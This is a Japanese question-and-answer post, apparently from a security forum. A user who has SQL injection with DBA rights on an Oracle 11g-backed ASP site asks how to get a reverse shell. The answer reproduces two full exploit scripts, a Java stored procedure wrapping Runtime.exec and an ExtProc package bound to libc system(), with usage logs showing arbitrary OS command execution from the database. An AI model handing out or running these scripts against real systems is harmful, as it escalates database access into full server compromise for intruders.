ASPコードを使用するWebサイトでSQLインジェクションをテストしています。すべてのデータベースとテーブルを正常に取得できます。現在のユーザーはDBA権限を持っています。どのようにしてリバースシェルを取得できますか?このSQLインジェクション。Oracleのバージョンは「Oracle Database 11g Enterprise Edition Release 11.1.0.7.0」です。
Oracle DBMSでコードを実行するこの2つの方法を試すことができます。
最初はJavaコード: http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql
-- Usage example:
-- $ sqlplus "/ as sysdba"
-- [...]
-- SQL> @raptor_oraexec.sql
-- [...]
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l > /tmp/aaa');
-- SQL> exec javawritefile('/tmp/mytest', '/bin/ls -l / > /tmp/bbb');
-- SQL> exec dbms_Java.set_output(2000);
-- SQL> set serveroutput on;
-- SQL> exec javareadfile('/tmp/mytest');
-- /bin/ls -l > /tmp/aaa
-- /bin/ls -l / >/tmp/bbb
-- SQL> exec javacmd('/bin/sh /tmp/mytest');
-- SQL> !sh
-- $ ls -rtl /tmp/
-- [...]
-- -rw-r--r-- 1 Oracle system 45 Nov 22 12:20 mytest
-- -rw-r--r-- 1 Oracle system 1645 Nov 22 12:20 aaa
-- -rw-r--r-- 1 Oracle system 8267 Nov 22 12:20 bbb
-- [...]
--
create or replace and resolve Java source named "oraexec" as
import Java.lang.*;
import Java.io.*;
public class oraexec
{
/*
* Command execution module
*/
public static void execCommand(String command) throws IOException
{
Runtime.getRuntime().exec(command);
}
/*
* File reading module
*/
public static void readFile(String filename) throws IOException
{
FileReader f = new FileReader(filename);
BufferedReader fr = new BufferedReader(f);
String text = fr.readLine();
while (text != null) {
System.out.println(text);
text = fr.readLine();
}
fr.close();
}
/*
* File writing module
*/
public static void writeFile(String filename, String line) throws IOException
{
FileWriter f = new FileWriter(filename, true); /* append */
BufferedWriter fw = new BufferedWriter(f);
fw.write(line);
fw.write("\n");
fw.close();
}
}
/
-- usage: exec javacmd('command');
create or replace procedure javacmd(p_command varchar2) as
language Java
name 'oraexec.execCommand(Java.lang.String)';
/
-- usage: exec dbms_Java.set_output(2000);
-- set serveroutput on;
-- exec javareadfile('/path/to/file');
create or replace procedure javareadfile(p_filename in varchar2) as
language Java
name 'oraexec.readFile(Java.lang.String)';
/
-- usage: exec javawritefile('/path/to/file', 'line to append');
create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) as
language Java
name 'oraexec.writeFile(Java.lang.String, Java.lang.String)';
/
2番目はExtProcを使用しています: http://www.0xdeadbeef.info/exploits/raptor_oraextproc.sql
-- Usage example:
-- $ echo $Oracle_HOME
-- /opt/Oracle/
-- $ sqlplus "/ as sysdba"
-- [...]
-- Connected to:
-- Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
-- With the Partitioning, OLAP and Oracle Data Mining options
-- JServer Release 9.2.0.1.0 - Production
-- SQL> @raptor_oraextproc.sql
-- [...]
-- exec oracmd32.exec('touch /tmp/32');
-- [...]
-- ERROR at line 1:
-- ORA-06520: PL/SQL: Error loading external library
-- ORA-06522: ld.so.1: extprocPLSExtProc: fatal:
-- /opt/Oracle/bin/../../../../../../../lib/32/libc.so.1: wrong ELF class:
-- ELFCLASS32
-- [...]
-- SQL> exec oracmd64.exec('touch /tmp/64');
-- SQL> !ls -l /tmp/64
-- -rw-r--r-- 1 Oracle orainst 0 Dec 19 13:49 /tmp/64
--
-- library for 32-bit Oracle releases
create or replace library exec_Shell32 as
'$Oracle_HOME/bin/../../../../../../../lib/32/libc.so.1';
/
-- library for 64-bit Oracle releases
create or replace library exec_Shell64 as
'$Oracle_HOME/bin/../../../../../../../lib/64/libc.so.1';
/
-- package for 32-bit Oracle releases
-- usage: exec oracmd32.exec('command');
create or replace package oracmd32 as
procedure exec(cmdstring in char);
end oracmd32;
/
create or replace package body oracmd32 as
procedure exec(cmdstring in char)
is external
name "system"
library exec_Shell32
language c;
end oracmd32;
/
-- package for 64-bit Oracle releases
-- usage: exec oracmd64.exec('command');
create or replace package oracmd64 as
procedure exec(cmdstring in char);
end oracmd64;
/
create or replace package body oracmd64 as
procedure exec(cmdstring in char)
is external
name "system"
library exec_Shell64
language c;
end oracmd64;
/